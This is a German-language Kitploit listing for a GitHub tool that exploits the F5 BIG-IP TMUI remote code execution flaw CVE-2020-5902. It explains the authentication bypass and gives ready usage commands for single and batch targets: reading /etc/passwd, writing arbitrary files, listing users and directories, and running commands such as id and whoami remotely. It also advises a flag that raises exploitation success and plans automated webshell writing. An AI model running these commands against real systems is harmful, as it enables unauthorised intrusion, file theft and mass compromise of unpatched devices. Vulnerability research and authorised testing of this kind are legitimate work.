Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
f5-bigip-rce-cve-2020-5902 — F5 BIG-IP RCE CVE-2020-5902 automatisches Prüftool | Kitploit
Tools/GitHubGitHub/thelsa/f5-bigip-rce-cve-2020-5902
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and Control
GitHubthelsa/f5-bigip-rce-cve-2020-5902

f5-bigip-rce-cve-2020-5902

F5 BIG-IP RCE CVE-2020-5902 automatisches Prüftool

Repository anzeigen
6217vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

F5 BIG-IP RCE(CVE-2020-5902)Schwachstellenerkennungstool

Zusammenfassung

Am 06.07.2020 wurde die F5 BIG-IP TMUI RCE-Schwachstelle öffentlich bekannt.

Die TMUI-Komponente (Traffic Management User Interface) von F5 BIG-IP weist eine Authentifizierungsumgehungsschwachstelle auf. Diese liegt darin, dass die von Tomcat geparste URL und request.getPathInfo() voneinander abweichen, wodurch die Berechtigungsprüfung umgangen werden kann. Dadurch kann ohne Authentifizierung auf alle Funktionen des TMUI-Moduls zugegriffen werden, was das Lesen/Schreiben beliebiger Dateien, die Ausführung von Befehlen usw. ermöglicht.

Details siehe F5 BIG-IP TMUI RCE-Schwachstelle (CVE-2020-5902) Reproduktion und Hinweise

Dieses Tool unterstützt die Einzel-IP-Erkennung, die Batch-IP-Erkennung, das Lesen und Schreiben von Dateien, das Auflisten authentifizierter Benutzer, das Auflisten von Verzeichnissen, die Remote-Befehlsausführung und die Erkennung der HSQLDB-Authentifizierungsumgehung.

Schnellstart

pip install requests

hlep

python f5-bigip-rce-cve-2020-5902.py -h

poc check

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

batch poc check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

read file

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

save file

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

list auth user

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

list directory

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

RCE

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

batch RCE

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

hsqldb bypass check

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

batch hsqldb bypass check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

Hinweis

Fügen Sie bei Batch-IPs wenn möglich http:\/\/ oder https:\/\/ am Anfang hinzu. Wenn kein Protokoll angegeben ist, wird standardmäßig http:\/\/ verwendet.

Fügen Sie nach Möglichkeit den Parameter --still-exploit hinzu, damit RCE auch dann ausgeführt wird, wenn das Auflisten der authentifizierten Benutzer fehlschlägt, um die Erfolgsquote zu erhöhen.

TODO

  1. Mehrfaches Senden von Anfragen zur Erhöhung der Batch-Erfolgsrate, unter Berücksichtigung der Effizienz.

  2. Integration der Ausnutzung der HSQLDB-Schnittstelle durch Deserialisierung.

  3. Automatisierung des Schreibens von Webshells.

Feedback

issus
lsablog
gmail:[email protected]
qq:[email protected]

Tool herunterladen